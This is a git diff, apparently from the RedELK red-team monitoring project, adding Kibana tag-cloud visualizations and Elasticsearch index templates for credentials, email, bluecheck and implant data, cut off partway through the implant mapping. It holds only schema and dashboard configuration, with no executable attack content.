+ "version": "1" + }, + { + "attributes": { + "description": "", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "savedSearchRefName": "search_0", + "title": "RedELK - MITRE ATT&CK Tactics tag cloud", + "uiStateJSON": "{}", + "version": 1, + "visState": { + "aggs": [ + { + "enabled": true, + "id": "1", + "params": {}, + "schema": "metric", + "type": "count" + }, + { + "enabled": true, + "id": "2", + "params": { + "field": "signal.rule.threat.tactic.name", + "missingBucket": false, + "missingBucketLabel": "Missing", + "order": "desc", + "orderBy": "1", + "otherBucket": true, + "otherBucketLabel": "Other", + "size": 300 + }, + "schema": "segment", + "type": "terms" + } + ], + "params": { + "maxFontSize": 64, + "minFontSize": 18, + "orientation": "single", + "palette": { + "name": "kibana_palette", + "type": "palette" + }, + "scale": "linear", + "showLabel": false + }, + "title": "RedELK - MITRE ATT&CK Tactics tag cloud", + "type": "tagcloud" + } + }, + "coreMigrationVersion": "7.16.3", + "id": "ff3c3b80-d050-11ea-9301-a30a04251ae9", + "migrationVersion": { + "visualization": "7.14.0" + }, + "references": [ + { + "id": "dddbba20-d04f-11ea-9301-a30a04251ae9", + "name": "search_0", + "type": "search" + } + ], + "sort": [ + 1642171875895, + 194 + ], + "type": "visualization", + "version": "1" + }, + { + "attributes": { + "description": "", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "savedSearchRefName": "search_0", + "title": "RedELK - Credentials per realm tag cloud", + "uiStateJSON": "{}", + "version": 1, + "visState": { + "aggs": [ + { + "enabled": true, + "id": "1", + "params": {}, + "schema": "metric", + "type": "count" + }, + { + "enabled": true, + "id": "2", + "params": { + "field": "creds.realm.keyword", + "missingBucket": false, + "missingBucketLabel": "Missing", + "order": "desc", + "orderBy": "1", + "otherBucket": true, + "otherBucketLabel": "Other", + "size": 100 + }, + "schema": "segment", + "type": "terms" + } + ], + "params": { + "maxFontSize": 72, + "minFontSize": 18, + "orientation": "single", + "palette": { + "name": "kibana_palette", + "type": "palette" + }, + "scale": "linear", + "showLabel": false + }, + "title": "RedELK - Credentials per realm tag cloud", + "type": "tagcloud" + } + }, + "coreMigrationVersion": "7.16.3", + "id": "ff4497f0-d319-11ea-9301-a30a04251ae9", + "migrationVersion": { + "visualization": "7.14.0" + }, + "references": [ + { + "id": "3fabe620-6c38-11ea-97d6-55783aed877a", + "name": "search_0", + "type": "search" + } + ], + "sort": [ + 1642171875895, + 196 + ], + "type": "visualization", + "version": "1" + } +] \ No newline at end of file diff --git a/elkserver/docker/redelk-base/redelkinstalldata/redelk_elasticsearch_ilm.json b/elkserver/docker/redelk-base/redelkinstalldata/redelk_elasticsearch_ilm.json new file mode 100644 index 00000000..c11edf8f --- /dev/null +++ b/elkserver/docker/redelk-base/redelkinstalldata/redelk_elasticsearch_ilm.json @@ -0,0 +1 @@ +{"policy":{"phases":{"hot":{"min_age":"0ms","actions":{"rollover":{"max_size":"100gb","max_age":"365d"},"set_priority":{"priority":1}}}}}} diff --git a/elkserver/docker/redelk-base/redelkinstalldata/redelk_elasticsearch_template_bluecheck.json b/elkserver/docker/redelk-base/redelkinstalldata/redelk_elasticsearch_template_bluecheck.json new file mode 100644 index 00000000..9ff9b079 --- /dev/null +++ b/elkserver/docker/redelk-base/redelkinstalldata/redelk_elasticsearch_template_bluecheck.json @@ -0,0 +1,154 @@ +{ + "aliases": {}, + "index_patterns": [ + "bluecheck" + ], + "mappings": { + "_meta": {}, + "_source": {}, + "properties": { + "bluecheck": { + "properties": { + "accountname": { + "type": "text" + }, + "accountstate": { + "type": "text" + }, + "certissuer": { + "type": "text" + }, + "certsubject": { + "type": "text" + }, + "message": { + "type": "text" + }, + "pwchangedate": { + "type": "date" + }, + "sectools": { + "properties": { + "ProcessID": { + "type": "text" + }, + "Product": { + "type": "text" + }, + "Vendor": { + "type": "text" + } + }, + "type": "nested" + }, + "sectoolsamount": { + "type": "integer" + }, + "uri": { + "type": "text" + } + }, + "type": "object" + }, + "bluechecktimestamp": { + "type": "text" + }, + "bluechecktype": { + "type": "text" + }, + "classifier": { + "type": "keyword" + }, + "domain": { + "type": "keyword" + }, + "host": { + "properties": { + "domain_ext": { + "type": "text" + }, + "ip": { + "type": "ip" + }, + "ip_ext": { + "type": "ip" + }, + "ip_int": { + "type": "ip" + }, + "name": { + "type": "text" + }, + "os": { + "dynamic": true, + "enabled": true, + "properties": { + "family": { + "type": "text" + }, + "full": { + "type": "text" + }, + "kernel": { + "type": "text" + }, + "name": { + "type": "text" + }, + "platform": { + "type": "text" + }, + "version": { + "type": "text" + } + }, + "type": "object" + } + }, + "type": "object" + }, + "infra": { + "properties": { + "attack_scenario": { + "type": "keyword" + } + }, + "type": "object" + }, + "message": { + "type": "text" + }, + "path": { + "type": "keyword" + }, + "pstools": { + "properties": { + "psx": { + "properties": { + "edr_name": { + "type": "text" + }, + "security_product": { + "type": "text" + } + }, + "type": "object" + }, + "tool": { + "type": "text" + } + }, + "type": "object" + }, + "results": { + "type": "text" + }, + "type": { + "type": "keyword" + } + } + }, + "order": 0, + "settings": {}, + "version": 3 +} \ No newline at end of file diff --git a/elkserver/docker/redelk-base/redelkinstalldata/redelk_elasticsearch_template_credentials.json b/elkserver/docker/redelk-base/redelkinstalldata/redelk_elasticsearch_template_credentials.json new file mode 100644 index 00000000..f9e197a3 --- /dev/null +++ b/elkserver/docker/redelk-base/redelkinstalldata/redelk_elasticsearch_template_credentials.json @@ -0,0 +1,354 @@ +{ + "aliases": {}, + "index_patterns": [ + "credentials" + ], + "mappings": { + "_meta": { + "beat": "rtops", + "version": "7.8.0" + }, + "_routing": { + "required": false + }, + "_source": { + "enabled": true, + "excludes": [], + "includes": [] + }, + "date_detection": false, + "dynamic": true, + "dynamic_templates": [ + { + "labels": { + "mapping": { + "type": "flattened" + }, + "path_match": "alarm.alarm_*" + } + } + ], + "numeric_detection": false, + "properties": { + "@timestamp": { + "type": "date" + }, + "agent": { + "properties": { + "ephemeral_id": { + "ignore_above": 1024, + "type": "keyword" + }, + "hostname": { + "ignore_above": 1024, + "type": "keyword" + }, + "id": { + "ignore_above": 1024, + "type": "keyword" + }, + "name": { + "ignore_above": 1024, + "type": "keyword" + }, + "type": { + "ignore_above": 1024, + "type": "keyword" + }, + "version": { + "ignore_above": 1024, + "type": "keyword" + } + }, + "type": "object" + }, + "c2": { + "properties": { + "log": { + "properties": { + "type": { + "type": "keyword" + } + }, + "type": "object" + }, + "program": { + "type": "keyword" + } + }, + "type": "object" + }, + "creds": { + "properties": { + "credential": { + "type": "keyword" + }, + "host": { + "type": "keyword" + }, + "realm": { + "type": "keyword" + }, + "source": { + "type": "keyword" + }, + "username": { + "type": "keyword" + } + }, + "type": "object" + }, + "ecs": { + "properties": { + "version": { + "ignore_above": 1024, + "type": "keyword" + } + }, + "type": "object" + }, + "event": { + "properties": { + "action": { + "ignore_above": 1024, + "type": "keyword" + }, + "category": { + "ignore_above": 1024, + "type": "keyword" + }, + "code": { + "ignore_above": 1024, + "type": "keyword" + }, + "created": { + "type": "date" + }, + "dataset": { + "ignore_above": 1024, + "type": "keyword" + }, + "duration": { + "type": "long" + }, + "end": { + "type": "date" + }, + "enriched_from": { + "type": "keyword" + }, + "hash": { + "ignore_above": 1024, + "type": "keyword" + }, + "id": { + "ignore_above": 1024, + "type": "keyword" + }, + "ingested": { + "type": "date" + }, + "kind": { + "ignore_above": 1024, + "type": "keyword" + }, + "module": { + "ignore_above": 1024, + "type": "keyword" + }, + "original": { + "ignore_above": 1024, + "type": "keyword" + }, + "outcome": { + "ignore_above": 1024, + "type": "keyword" + }, + "provider": { + "ignore_above": 1024, + "type": "keyword" + }, + "reference": { + "ignore_above": 1024, + "type": "keyword" + }, + "risk_score": { + "type": "float" + }, + "risk_score_norm": { + "type": "float" + }, + "sequence": { + "type": "long" + }, + "severity": { + "type": "long" + }, + "start": { + "type": "date" + }, + "timezone": { + "ignore_above": 1024, + "type": "keyword" + }, + "type": { + "ignore_above": 1024, + "type": "keyword" + }, + "url": { + "ignore_above": 1024, + "type": "keyword" + } + }, + "type": "object" + }, + "infra": { + "properties": { + "attack_scenario": { + "doc_values": true, + "eager_global_ordinals": false, + "index": true, + "index_options": "docs", + "norms": false, + "split_queries_on_whitespace": false, + "store": false, + "type": "keyword" + }, + "log_type": { + "type": "keyword" + } + }, + "type": "object" + }, + "input": { + "properties": { + "type": { + "ignore_above": 1024, + "type": "keyword" + } + }, + "type": "object" + }, + "log": { + "properties": { + "file": { + "properties": { + "path": { + "ignore_above": 1024, + "type": "keyword" + } + }, + "type": "object" + }, + "flags": { + "ignore_above": 1024, + "type": "keyword" + }, + "level": { + "ignore_above": 1024, + "type": "keyword" + }, + "logger": { + "ignore_above": 1024, + "type": "keyword" + }, + "offset": { + "type": "long" + }, + "origin": { + "properties": { + "file": { + "properties": { + "line": { + "type": "long" + }, + "name": { + "ignore_above": 1024, + "type": "keyword" + } + }, + "type": "object" + }, + "function": { + "ignore_above": 1024, + "type": "keyword" + } + }, + "type": "object" + }, + "original": { + "ignore_above": 1024, + "type": "keyword" + }, + "source": { + "properties": { + "address": { + "ignore_above": 1024, + "type": "keyword" + } + }, + "type": "object" + }, + "syslog": { + "properties": { + "facility": { + "properties": { + "code": { + "type": "long" + }, + "name": { + "ignore_above": 1024, + "type": "keyword" + } + }, + "type": "object" + }, + "priority": { + "type": "long" + }, + "severity": { + "properties": { + "code": { + "type": "long" + }, + "name": { + "ignore_above": 1024, + "type": "keyword" + } + }, + "type": "object" + } + }, + "type": "object" + } + }, + "type": "object" + }, + "message": { + "norms": false, + "type": "text" + }, + "tags": { + "ignore_above": 1024, + "type": "keyword" + } + } + }, + "order": 1, + "settings": { + "index": { + "mapping": { + "total_fields": { + "limit": "10000" + } + }, + "number_of_replicas": "0", + "number_of_shards": "1", + "query": { + "default_field": "*" + }, + "refresh_interval": "5s" + } + }, + "version": 1 +} \ No newline at end of file diff --git a/elkserver/docker/redelk-base/redelkinstalldata/redelk_elasticsearch_template_email.json b/elkserver/docker/redelk-base/redelkinstalldata/redelk_elasticsearch_template_email.json new file mode 100644 index 00000000..d4165f8f --- /dev/null +++ b/elkserver/docker/redelk-base/redelkinstalldata/redelk_elasticsearch_template_email.json @@ -0,0 +1,827 @@ +{ + "aliases": {}, + "index_patterns": [ + "email-*" + ], + "mappings": { + "_meta": {}, + "_source": {}, + "properties": { + "@timestamp": { + "type": "date" + }, + "@version": { + "fields": { + "keyword": { + "ignore_above": 256, + "type": "keyword" + } + }, + "type": "text" + }, + "arc-authentication-results": { + "fields": { + "keyword": { + "ignore_above": 256, + "type": "keyword" + } + }, + "type": "text" + }, + "arc-message-signature": { + "fields": { + "keyword": { + "ignore_above": 256, + "type": "keyword" + } + }, + "type": "text" + }, + "arc-seal": { + "fields": { + "keyword": { + "ignore_above": 256, + "type": "keyword" + } + }, + "type": "text" + }, + "authentication-results": { + "fields": { + "keyword": { + "ignore_above": 256, + "type": "keyword" + } + }, + "type": "text" + }, + "content-language": { + "fields": { + "keyword": { + "ignore_above": 256, + "type": "keyword" + } + }, + "type": "text" + }, + "content-transfer-encoding": { + "fields": { + "keyword": { + "ignore_above": 256, + "type": "keyword" + } + }, + "type": "text" + }, + "content-type": { + "fields": { + "keyword": { + "ignore_above": 256, + "type": "keyword" + } + }, + "type": "text" + }, + "date": { + "fields": { + "keyword": { + "ignore_above": 256, + "type": "keyword" + } + }, + "type": "text" + }, + "dkim-signature": { + "fields": { + "keyword": { + "ignore_above": 256, + "type": "keyword" + } + }, + "type": "text" + }, + "emailfolder": { + "doc_values": true, + "eager_global_ordinals": false, + "fields": { + "keyword": { + "ignore_above": 256, + "type": "keyword" + } + }, + "index": true, + "index_options": "docs", + "norms": false, + "split_queries_on_whitespace": false, + "store": false, + "type": "keyword" + }, + "feedback-id": { + "fields": { + "keyword": { + "ignore_above": 256, + "type": "keyword" + } + }, + "type": "text" + }, + "from": { + "fields": { + "keyword": { + "ignore_above": 256, + "type": "keyword" + } + }, + "type": "text" + }, + "in-reply-to": { + "fields": { + "keyword": { + "ignore_above": 256, + "type": "keyword" + } + }, + "type": "text" + }, + "infra": { + "properties": { + "attack_scenario": { + "type": "keyword" + }, + "log_type": { + "type": "keyword" + } + }, + "type": "object" + }, + "message": { + "fields": { + "keyword": { + "ignore_above": 256, + "type": "keyword" + } + }, + "type": "text" + }, + "message-id": { + "fields": { + "keyword": { + "ignore_above": 256, + "type": "keyword" + } + }, + "type": "text" + }, + "mime-version": { + "fields": { + "keyword": { + "ignore_above": 256, + "type": "keyword" + } + }, + "type": "text" + }, + "received": { + "fields": { + "keyword": { + "ignore_above": 256, + "type": "keyword" + } + }, + "type": "text" + }, + "received-spf": { + "fields": { + "keyword": { + "ignore_above": 256, + "type": "keyword" + } + }, + "type": "text" + }, + "references": { + "fields": { + "keyword": { + "ignore_above": 256, + "type": "keyword" + } + }, + "type": "text" + }, + "return-path": { + "fields": { + "keyword": { + "ignore_above": 256, + "type": "keyword" + } + }, + "type": "text" + }, + "subject": { + "fields": { + "keyword": { + "ignore_above": 256, + "type": "keyword" + } + }, + "type": "text" + }, + "thread-index": { + "fields": { + "keyword": { + "ignore_above": 256, + "type": "keyword" + } + }, + "type": "text" + }, + "to": { + "fields": { + "keyword": { + "ignore_above": 256, + "type": "keyword" + } + }, + "type": "text" + }, + "x-account-notification-type": { + "fields": { + "keyword": { + "ignore_above": 256, + "type": "keyword" + } + }, + "type": "text" + }, + "x-eopattributedmessage": { + "fields": { + "keyword": { + "ignore_above": 256, + "type": "keyword" + } + }, + "type": "text" + }, + "x-eoptenantattributedmessage": { + "fields": { + "keyword": { + "ignore_above": 256, + "type": "keyword" + } + }, + "type": "text" + }, + "x-forefront-antispam-report-untrusted": { + "fields": { + "keyword": { + "ignore_above": 256, + "type": "keyword" + } + }, + "type": "text" + }, + "x-gm-message-state": { + "fields": { + "keyword": { + "ignore_above": 256, + "type": "keyword" + } + }, + "type": "text" + }, + "x-google-dkim-signature": { + "fields": { + "keyword": { + "ignore_above": 256, + "type": "keyword" + } + }, + "type": "text" + }, + "x-google-smtp-source": { + "fields": { + "keyword": { + "ignore_above": 256, + "type": "keyword" + } + }, + "type": "text" + }, + "x-incomingheadercount": { + "fields": { + "keyword": { + "ignore_above": 256, + "type": "keyword" + } + }, + "type": "text" + }, + "x-incomingtopheadermarker": { + "fields": { + "keyword": { + "ignore_above": 256, + "type": "keyword" + } + }, + "type": "text" + }, + "x-message-delivery": { + "fields": { + "keyword": { + "ignore_above": 256, + "type": "keyword" + } + }, + "type": "text" + }, + "x-message-info": { + "fields": { + "keyword": { + "ignore_above": 256, + "type": "keyword" + } + }, + "type": "text" + }, + "x-microsoft-antispam": { + "fields": { + "keyword": { + "ignore_above": 256, + "type": "keyword" + } + }, + "type": "text" + }, + "x-microsoft-antispam-mailbox-delivery": { + "fields": { + "keyword": { + "ignore_above": 256, + "type": "keyword" + } + }, + "type": "text" + }, + "x-microsoft-antispam-message-info": { + "fields": { + "keyword": { + "ignore_above": 256, + "type": "keyword" + } + }, + "type": "text" + }, + "x-microsoft-antispam-message-info-original": { + "fields": { + "keyword": { + "ignore_above": 256, + "type": "keyword" + } + }, + "type": "text" + }, + "x-microsoft-antispam-prvs": { + "fields": { + "keyword": { + "ignore_above": 256, + "type": "keyword" + } + }, + "type": "text" + }, + "x-microsoft-antispam-untrusted": { + "fields": { + "keyword": { + "ignore_above": 256, + "type": "keyword" + } + }, + "type": "text" + }, + "x-ms-exchange-antispam-messagedata": { + "fields": { + "keyword": { + "ignore_above": 256, + "type": "keyword" + } + }, + "type": "text" + }, + "x-ms-exchange-antispam-messagedata-original": { + "type": "text" + }, + "x-ms-exchange-authentication-results": { + "fields": { + "keyword": { + "ignore_above": 256, + "type": "keyword" + } + }, + "type": "text" + }, + "x-ms-exchange-crosstenant-authas": { + "fields": { + "keyword": { + "ignore_above": 256, + "type": "keyword" + } + }, + "type": "text" + }, + "x-ms-exchange-crosstenant-authsource": { + "fields": { + "keyword": { + "ignore_above": 256, + "type": "keyword" + } + }, + "type": "text" + }, + "x-ms-exchange-crosstenant-fromentityheader": { + "fields": { + "keyword": { + "ignore_above": 256, + "type": "keyword" + } + }, + "type": "text" + }, + "x-ms-exchange-crosstenant-id": { + "fields": { + "keyword": { + "ignore_above": 256, + "type": "keyword" + } + }, + "type": "text" + }, + "x-ms-exchange-crosstenant-network-message-id": { + "fields": { + "keyword": { + "ignore_above": 256, + "type": "keyword" + } + }, + "type": "text" + }, + "x-ms-exchange-crosstenant-originalarrivaltime": { + "fields": { + "keyword": { + "ignore_above": 256, + "type": "keyword" + } + }, + "type": "text" + }, + "x-ms-exchange-crosstenant-originalattributedtenantconnectingip": { + "fields": { + "keyword": { + "ignore_above": 256, + "type": "keyword" + } + }, + "type": "text" + }, + "x-ms-exchange-crosstenant-rms-persistedconsumerorg": { + "fields": { + "keyword": { + "ignore_above": 256, + "type": "keyword" + } + }, + "type": "text" + }, + "x-ms-exchange-eopdirect": { + "fields": { + "keyword": { + "ignore_above": 256, + "type": "keyword" + } + }, + "type": "text" + }, + "x-ms-exchange-minimumurldomainage": { + "fields": { + "keyword": { + "ignore_above": 256, + "type": "keyword" + } + }, + "type": "text" + }, + "x-ms-exchange-organization-authas": { + "fields": { + "keyword": { + "ignore_above": 256, + "type": "keyword" + } + }, + "type": "text" + }, + "x-ms-exchange-organization-authsource": { + "fields": { + "keyword": { + "ignore_above": 256, + "type": "keyword" + } + }, + "type": "text" + }, + "x-ms-exchange-organization-expirationinterval": { + "fields": { + "keyword": { + "ignore_above": 256, + "type": "keyword" + } + }, + "type": "text" + }, + "x-ms-exchange-organization-expirationintervalreason": { + "fields": { + "keyword": { + "ignore_above": 256, + "type": "keyword" + } + }, + "type": "text" + }, + "x-ms-exchange-organization-expirationstarttime": { + "fields": { + "keyword": { + "ignore_above": 256, + "type": "keyword" + } + }, + "type": "text" + }, + "x-ms-exchange-organization-expirationstarttimereason": { + "fields": { + "keyword": { + "ignore_above": 256, + "type": "keyword" + } + }, + "type": "text" + }, + "x-ms-exchange-organization-messagedirectionality": { + "fields": { + "keyword": { + "ignore_above": 256, + "type": "keyword" + } + }, + "type": "text" + }, + "x-ms-exchange-organization-network-message-id": { + "fields": { + "keyword": { + "ignore_above": 256, + "type": "keyword" + } + }, + "type": "text" + }, + "x-ms-exchange-organization-pcl": { + "fields": { + "keyword": { + "ignore_above": 256, + "type": "keyword" + } + }, + "type": "text" + }, + "x-ms-exchange-organization-recordreviewcfmtype": { + "fields": { + "keyword": { + "ignore_above": 256, + "type": "keyword" + } + }, + "type": "text" + }, + "x-ms-exchange-organization-scl": { + "fields": { + "keyword": { + "ignore_above": 256, + "type": "keyword" + } + }, + "type": "text" + }, + "x-ms-exchange-processed-by-bccfoldering": { + "fields": { + "keyword": { + "ignore_above": 256, + "type": "keyword" + } + }, + "type": "text" + }, + "x-ms-exchange-senderadcheck": { + "fields": { + "keyword": { + "ignore_above": 256, + "type": "keyword" + } + }, + "type": "text" + }, + "x-ms-exchange-transport-crosstenantheaderspromoted": { + "fields": { + "keyword": { + "ignore_above": 256, + "type": "keyword" + } + }, + "type": "text" + }, + "x-ms-exchange-transport-crosstenantheadersstamped": { + "fields": { + "keyword": { + "ignore_above": 256, + "type": "keyword" + } + }, + "type": "text" + }, + "x-ms-exchange-transport-crosstenantheadersstripped": { + "fields": { + "keyword": { + "ignore_above": 256, + "type": "keyword" + } + }, + "type": "text" + }, + "x-ms-exchange-transport-endtoendlatency": { + "fields": { + "keyword": { + "ignore_above": 256, + "type": "keyword" + } + }, + "type": "text" + }, + "x-ms-has-attach": { + "fields": { + "keyword": { + "ignore_above": 256, + "type": "keyword" + } + }, + "type": "text" + }, + "x-ms-office365-filtering-correlation-id": { + "fields": { + "keyword": { + "ignore_above": 256, + "type": "keyword" + } + }, + "type": "text" + }, + "x-ms-office365-filtering-correlation-id-prvs": { + "fields": { + "keyword": { + "ignore_above": 256, + "type": "keyword" + } + }, + "type": "text" + }, + "x-ms-oob-tlc-oobclassifiers": { + "fields": { + "keyword": { + "ignore_above": 256, + "type": "keyword" + } + }, + "type": "text" + }, + "x-ms-publictraffictype": { + "fields": { + "keyword": { + "ignore_above": 256, + "type": "keyword" + } + }, + "type": "text" + }, + "x-ms-tnef-correlator": { + "fields": { + "keyword": { + "ignore_above": 256, + "type": "keyword" + } + }, + "type": "text" + }, + "x-ms-traffictypediagnostic": { + "fields": { + "keyword": { + "ignore_above": 256, + "type": "keyword" + } + }, + "type": "text" + }, + "x-ms-userlastlogontime": { + "fields": { + "keyword": { + "ignore_above": 256, + "type": "keyword" + } + }, + "type": "text" + }, + "x-msametadata": { + "fields": { + "keyword": { + "ignore_above": 256, + "type": "keyword" + } + }, + "type": "text" + }, + "x-msapipeline": { + "fields": { + "keyword": { + "ignore_above": 256, + "type": "keyword" + } + }, + "type": "text" + }, + "x-notifications": { + "fields": { + "keyword": { + "ignore_above": 256, + "type": "keyword" + } + }, + "type": "text" + }, + "x-originatororg": { + "fields": { + "keyword": { + "ignore_above": 256, + "type": "keyword" + } + }, + "type": "text" + }, + "x-received": { + "fields": { + "keyword": { + "ignore_above": 256, + "type": "keyword" + } + }, + "type": "text" + }, + "x-sender-ip": { + "fields": { + "keyword": { + "ignore_above": 256, + "type": "keyword" + } + }, + "type": "text" + }, + "x-sid-pra": { + "fields": { + "keyword": { + "ignore_above": 256, + "type": "keyword" + } + }, + "type": "text" + }, + "x-sid-result": { + "fields": { + "keyword": { + "ignore_above": 256, + "type": "keyword" + } + }, + "type": "text" + } + } + }, + "order": 1, + "settings": { + "index": { + "mapping": { + "total_fields": { + "limit": "10000" + } + }, + "number_of_replicas": "0", + "number_of_shards": "1", + "query": { + "default_field": "*" + }, + "refresh_interval": "5s" + } + }, + "version": 1 +} \ No newline at end of file diff --git a/elkserver/docker/redelk-base/redelkinstalldata/redelk_elasticsearch_template_implantsdb.json b/elkserver/docker/redelk-base/redelkinstalldata/redelk_elasticsearch_template_implantsdb.json new file mode 100644 index 00000000..968ecc9b --- /dev/null +++ b/elkserver/docker/redelk-base/redelkinstalldata/redelk_elasticsearch_template_implantsdb.json @@ -0,0 +1,904 @@ +{ + "aliases": {}, + "index_patterns": [ + "implantsdb" + ], + "mappings": { + "_meta": { + "beat": "rtops", + "version": "7.8.0" + }, + "_routing": { + "required": false + }, + "_source": { + "enabled": true, + "excludes": [], + "includes": [] + }, + "date_detection": false, + "dynamic": true, + "dynamic_templates": [ + { + "labels": { + "mapping": { + "type": "keyword" + }, + "match_mapping_type": "string", + "path_match": "labels.*" + } + }, + { + "container.labels": { + "mapping": { + "type": "keyword" + }, + "match_mapping_type": "string", + "path_match": "container.labels.*" + } + }, + { + "dns.answers": { + "mapping": { + "type": "keyword" + }, + "match_mapping_type": "string", + "path_match": "dns.answers.*" + } + }, + { + "log.syslog": { + "mapping": { + "type": "keyword" + }, + "match_mapping_type": "string", + "path_match": "log.syslog.*" + } + }, + { + "network.inner": { + "mapping": { + "type": "keyword" + }, + "match_mapping_type": "string", + "path_match": "network.inner.*" + } + }, + { + "observer.egress": { + "mapping": { + "type": "keyword" + }, + "match_mapping_type": "string", + "path_match": "observer.egress.*" + } + }, + { + "observer.ingress": { + "mapping": { + "type": "keyword" + }, + "match_mapping_type": "string", + "path_match": "observer.ingress.*" + } + }, + { + "fields": { + "mapping": { + "type": "keyword" + }, + "match_mapping_type": "string", + "path_match": "fields.*" + } + }, + { + "docker.container.labels": { + "mapping": { + "type": "keyword" + }, + "match_mapping_type": "string", + "path_match": "docker.container.labels.*" + } + }, + { + "kubernetes.labels.*": { + "mapping": { + "type": "keyword" + }, + "match_mapping_type": "*", + "path_match": "kubernetes.labels.*" + } + }, + { + "kubernetes.annotations.*": { + "mapping": { + "type": "keyword" + }, + "match_mapping_type": "*", + "path_match": "kubernetes.annotations.*" + } + }, + { + "docker.attrs": { + "mapping": { + "type": "keyword" + }, + "match_mapping_type": "string", + "path_match": "docker.attrs.*" + } + }, + { + "azure.activitylogs.identity.claims.*": { + "mapping": { + "type": "keyword" + }, + "match_mapping_type": "*", + "path_match": "azure.activitylogs.identity.claims.*" + } + }, + { + "kibana.log.meta": { + "mapping": { + "type": "keyword" + }, + "match_mapping_type": "string", + "path_match": "kibana.log.meta.*" + } + }, + { + "strings_as_keyword": { + "mapping": { + "ignore_above": 1024, + "type": "keyword" + }, + "match_mapping_type": "string" + } + } + ], + "numeric_detection": false, + "properties": { + "@timestamp": { + "type": "date" + }, + "agent": { + "properties": { + "ephemeral_id": { + "ignore_above": 1024, + "type": "keyword" + }, + "hostname": { + "ignore_above": 1024, + "type": "keyword" + }, + "id": { + "ignore_above": 1024, + "type": "keyword" + }, + "name": { + "ignore_above": 1024, + "type": "keyword" + }, + "type": { + "ignore_above": 1024, + "type": "keyword" + }, + "version": { + "ignore_above": 1024, + "type": "keyword" + } + }, + "type": "object" + }, + "c2": { + "properties": { + "log": { + "properties": { + "type": { + "type": "keyword" + } + }, + "type": "object" + }, + "message": { + "type": "keyword" + }, + "program": { + "type": "keyword" + }, + "timestamp": { + "type": "text" + } + }, + "type": "object" + }, + "creds": { + "properties": { + "credential": { + "type": "keyword" + }, + "host": { + "type": "keyword" + }, + "realm": { + "type": "keyword" + }, + "source": { + "type": "keyword" + }, + "username": { + "type": "keyword" + } + }, + "type": "object" + }, + "ecs": { + "properties": { + "version": { + "ignore_above": 1024, + "type": "keyword" + } + }, + "type": "object" + }, + "error": { + "properties": { + "code": { + "ignore_above": 1024, + "type": "keyword" + }, + "id": { + "ignore_above": 1024, + "type": "keyword" + }, + "message": { + "norms": false, + "type": "text" + }, + "stack_trace": { + "fields": { + "text": { + "norms": false, + "type": "text" + } + }, + "ignore_above": 1024, + "type": "keyword" + }, + "type": { + "ignore_above": 1024, + "type": "keyword" + } + }, + "type": "object" + }, + "event": { + "properties": { + "action": { + "ignore_above": 1024, + "type": "keyword" + }, + "category": { + "ignore_above": 1024, + "type": "keyword" + }, + "code": { + "ignore_above": 1024, + "type": "keyword" + }, + "created": { + "type": "date" + }, + "dataset": { + "ignore_above": 1024, + "type": "keyword" + }, + "duration": { + "type": "long" + }, + "end": { + "type": "date" + }, + "hash": { + "ignore_above": 1024, + "type": "keyword" + }, + "id": { + "ignore_above": 1024, + "type": "keyword" + }, + "ingested": { + "type": "date" + }, + "kind": { + "ignore_above": 1024, + "type": "keyword" + }, + "module": { + "ignore_above": 1024, + "type": "keyword" + }, + "original": { + "ignore_above": 1024, + "type": "keyword" + }, + "outcome": { + "ignore_above": 1024, + "type": "keyword" + }, + "provider": { + "ignore_above": 1024, + "type": "keyword" + }, + "reference": { + "ignore_above": 1024, + "type": "keyword" + }, + "risk_score": { + "type": "float" + }, + "risk_score_norm": { + "type": "float" + }, + "sequence": { + "type": "long" + }, + "severity": { + "type": "long" + }, + "start": { + "type": "date" + }, + "timezone": { + "ignore_above": 1024, + "type": "keyword" + }, + "type": { + "ignore_above": 1024, + "type": "keyword" + }, + "url": { + "ignore_above": 1024, + "type": "keyword" + } + }, + "type": "object" + }, + "file": { + "properties": { + "directory": { + "ignore_above": 1024, + "type": "keyword" + }, + "directory_local": { + "type": "keyword" + }, + "hash": { + "properties": { + "md5": { + "ignore_above": 1024, + "type": "keyword" + }, + "sha1": { + "ignore_above": 1024, + "type": "keyword" + }, + "sha256": { + "ignore_above": 1024, + "type": "keyword" + }, + "sha512": { + "ignore_above": 1024, + "type": "keyword" + } + }, + "type": "object" + }, + "name": { + "ignore_above": 1024, + "type": "keyword" + }, + "path": { + "fields": { + "text": { + "norms": false, + "type": "text" + } + }, + "ignore_above": 1024, + "type": "keyword" + }, + "path_local": { + "fields": { + "text": { + "type": "text" + } + }, + "type": "keyword" + }, + "size": { + "type": "long" + }, + "type": { + "ignore_above": 1024, + "type": "keyword" + }, + "url": { + "type": "keyword" + } + }, + "type": "object" + }, + "host": { + "properties": { + "architecture": { + "ignore_above": 1024, + "type": "keyword" + }, + "domain": { + "ignore_above": 1024, + "type": "keyword" + }, + "domain_ext": { + "doc_values": true, + "eager_global_ordinals": false, + "index": true, + "index_options": "docs", + "norms": false, + "split_queries_on_whitespace": false, + "store": false, + "type": "keyword" + }, + "geo": { + "properties": { + "as": { + "properties": { + "organization": { + "properties": { + "name": { + "type": "keyword" + }, + "number": { + "type": "integer" + } + }, + "type": "object" + } + }, + "type": "object" + }, + "city_name": { + "type": "keyword" + }, + "continent_name": { + "type": "keyword" + }, + "country_iso_code": { + "type": "keyword" + }, + "country_name": { + "type": "keyword" + }, + "location": { + "type": "geo_point" + }, + "name": { + "type": "keyword" + }, + "region_iso_code": { + "type": "keyword" + }, + "region_name": { + "type": "keyword" + } + }, + "type": "object" + }, + "hostname": { + "ignore_above": 1024, + "type": "keyword" + }, + "id": { + "ignore_above": 1024, + "type": "keyword" + }, + "ip": { + "type": "ip" + }, + "ip_ext": { + "doc_values": true, + "index": true, + "store": false, + "type": "ip" + }, + "ip_int": { + "type": "ip" + }, + "mac": { + "ignore_above": 1024, + "type": "keyword" + }, + "name": { + "ignore_above": 1024, + "type": "keyword" + }, + "os": { + "properties": { + "build": { + "ignore_above": 1024, + "type": "keyword" + }, + "codename": { + "ignore_above": 1024, + "type": "keyword" + }, + "family": { + "ignore_above": 1024, + "type": "keyword" + }, + "full": { + "fields": { + "text": { + "norms": false, + "type": "text" + } + }, + "ignore_above": 1024, + "type": "keyword" + }, + "kernel": { + "ignore_above": 1024, + "type": "keyword" + }, + "name": { + "fields": { + "text": { + "norms": false, + "type": "text" + } + }, + "ignore_above": 1024, + "type": "keyword" 